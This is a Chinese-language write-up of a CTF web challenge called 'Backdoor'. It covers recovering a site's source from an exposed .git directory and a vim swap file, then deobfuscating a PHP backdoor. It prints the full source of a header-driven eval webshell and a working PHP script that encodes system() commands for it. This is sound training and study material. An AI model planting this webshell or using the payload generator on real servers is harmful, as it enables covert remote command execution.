i春秋 “百度杯”CTF比赛 十月场 web题 Backdoor
0x00:
打开题目,题目中告诉我们这题是文件泄露。
0x01:
通过扫描目录,发现可以扫到的有3个文件
index.php
flag.php
robots.txt
但是浏览flag.php它告诉我们这不是真正的flag
又联系到题目文件泄露,于是测试.swp .swo .bak等备份文件后缀均无果。最后发现是.git泄露。
我们浏览这个url
http://6094ef7a9cad4288a4748de8ff8ffc573453e961300f46ce.game.ichunqiu.com/Challenges/.git/
注意到这里返回的是403(请求被拒绝),而不是404(访问无效)。那么这里就可以利用git泄露的脚本下载下来源文件。
这里使用的是rip-git.pl这个脚本,github地址:https://github.com/kost/dvcs-ripper
注:这里用rip-git.pl下载下来的文件是可以查看它上传github的历史记录的。而Githack这个工具虽然能下载文件,但是不能查看历史记录
查看flag.php
查看flag.php的日志
git log flag.php
可以看到他修改了很多次flag.php这个文件,我们回查一下上一次的修改时的内容
git diff 12c6ddf4af0a5542c1cf6a9ab19b4231c1fd9a88 flag.php
commit的值是test那次的值,可以看到在修改前是flag{true_flag_is_in_the_b4cko0r.php}
0x02:
上面那个flag还不是真正的flag,于是我们访问flag提示的文件
http://6094ef7a9cad4288a4748de8ff8ffc573453e961300f46ce.game.ichunqiu.com/Challenges/b4ckdo0r.php
得到下面信息,查看源码也啥都没有:
最后测出来是.swo文件备份,我们把备份下载下来
因为打开是乱码,我把它在下载好后,拖到我的kali虚拟机的桌面上,然后用vim打开备份文件的方式打开
vim -r .b4ckdo0r.php.swo
因为为了研究这个代码,又没法更改备份文件,我们用vim的复制功能把这里面的内容复制到一个新的php文件里面,然后放回我的windows下(因为我很喜欢用windows)
这个代码是混淆过的,但主要看$y和$L和$v这3个变量,分别对应的是
$y = create_function //这里去掉了字符串中的字母b
$L = 把上面的如 $c, $f等字符串变量中的“)m“给去掉
$v = create_function('', $L); 这里是生成一个不带参数的匿名函数,函数内容就是$L的内容。
然后运行$v()函数
根据这个逻辑解开混淆后$L的内容:
把内容打印到我们本地搭建的服务器上,然后查看源码,并整理下就是b4ckdo0r.php源码内容
注意:这里一定要看源码,因为中间有一部分"<"被当做html的标签了,没法完整显示
web本来的页面这里的代码很奇怪
查看源码发现原因,是因为<被当做标签起始了
整理后源码如下:
<?php $kh="4f7f"; $kf="28d7"; function x($t,$k) { $c=strlen($k); $l=strlen($t); $o=""; for($i=0; $i<$l;) { for($j=0; ($j<$c&&$i<$l); $j++,$i++) { $o.=$t{$i}^$k{$j}; } } return $o; } $r=$_SERVER; $rr=@$r["HTTP_REFERER"]; $ra=@$r["HTTP_ACCEPT_LANGUAGE"]; if($rr&&$ra) { $u=parse_url($rr); parse_str($u["query"],$q); $q=array_values($q); preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m); if($q&&$m) { @session_start(); $s=&$_SESSION; $ss="substr"; $sl="strtolower"; $i=$m[1][0].$m[1][1]; $h=$sl($ss(md5($i.$kh),0,3)); $f=$sl($ss(md5($i.$kf),0,3)); $p=""; for($z=1; $z<count($m[1]); $z++) $p.=$q[$m[2][$z]]; if(strpos($p,$h)===0) { $s[$i]=""; $p=$ss($p,3); } if(array_key_exists($i,$s)) { $s[$i].=$p; $e=strpos($s[$i],$f); if($e) { $k=$kh.$kf; ob_start(); @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k))); $o=ob_get_contents(); ob_end_clean(); $d=base64_encode(x(gzcompress($o),$k)); print("<$k>$d</$k>"); @session_destroy(); } } } }
解释一下这里的代码(因为我比较菜,通过每一步把变量输出,最后弄清楚搞了3个小时左右)
x($t, $k)函数是个异或函数,第一个参数和第二个参数按位对应异或,如果第二个参数全部异或了一遍,第一个还没结束,又从第二个参数头部从头开始。
$rr是通过http报头的Referer参数传入,我们可控
$rs是通过http报头的accept-language参数传入,我们可控
这里先介绍下accpet-language吧,举个栗子
这里的zh-CN是默认语言,之后每个值以“,(逗号)”隔开,格式为“ 语言;q=权重 ”
那么preg_match_all这个正则所做的事,看着很复杂,我们直接把他输出到自己服务器的web上吧
是一个二维数组,然后$i会取[1][0]和[1][1]的组合值
$h和f分别是 ($i . $kh)和($i . $kf)的md5值的前3个字符这里算出来是675和a3e
这一段代码会看language的语言有多少个,然后$p是以权重的小数部分值为下标,然后取Referer的url中的对应下标的参数的值的组合
这里举个例子,a=1中的1 就是$q[$m[2][0]],b=2中的2 就是$q[$m[2][1]]
然后就是判断$p这个变量前3个是不是675,后3个是不是a3e,最后我们的构造为 "675 + payload + a3e"
然后就是传到eval函数里面了,这里我们要通过eval函数来读目录,然后查看flag
eval中用了很多编码方式,也用到了自定的x($t, $k)这个异或函数,我们依次测试下顺序,就能正确的生成我们的payload,来构造system("ls");
这里异或的规律
a = b ^ c那么 b = a ^ c;这是一个很简单的规律,所以x函数即使编码函数,也是解码函数
最后附上我生成payload和解码返回值的内容的php代码
<?php function x($t,$k) { $c=strlen($k); $l=strlen($t); $o=""; for($i=0; $i<$l;) { for($j=0; ($j<$c&&$i<$l); $j++,$i++) { $o.= $t{$i} ^ $k{$j}; } } return $o; } function get_answer($str){ $str = base64_decode($str); $str = x($str, '4f7f28d7'); $str = gzuncompress($str); echo $str . "<br>"; } function input($cmd){ $str = 'system("' . $cmd . '");'; $t1 = gzcompress($str); echo '$t1 = ' . $t1 . "<br>"; $t2 = x($t1, '4f7f28d7'); echo '$t2 = ' . $t2 . "<br>"; $t3 = base64_encode($t2); echo '$t3 = ' . $t3 . "<br>"; return $t3; } $ra='zh-CN,zh;q=0.0'; input('ls'); //get_answer(''); ?>
把命令输入input里面,运行这个php脚本就会生成ls命令的payload,而我们accep-language所填内容为 'zh-CN,zh;q=0.0'
于是我们第一次的payload为:
将返回内容填到我们的脚本中,生成解码后的内容
然后生成cat this_i5_flag.php的payload,最后flag在源码中
注:这里我审计代码的时候是采用比较笨的方法,因为源码我们下载了下来,那么我么就可以任意修改,我是把每个地方有值的变化,就直接输出出来,方便更加透彻的理解流程。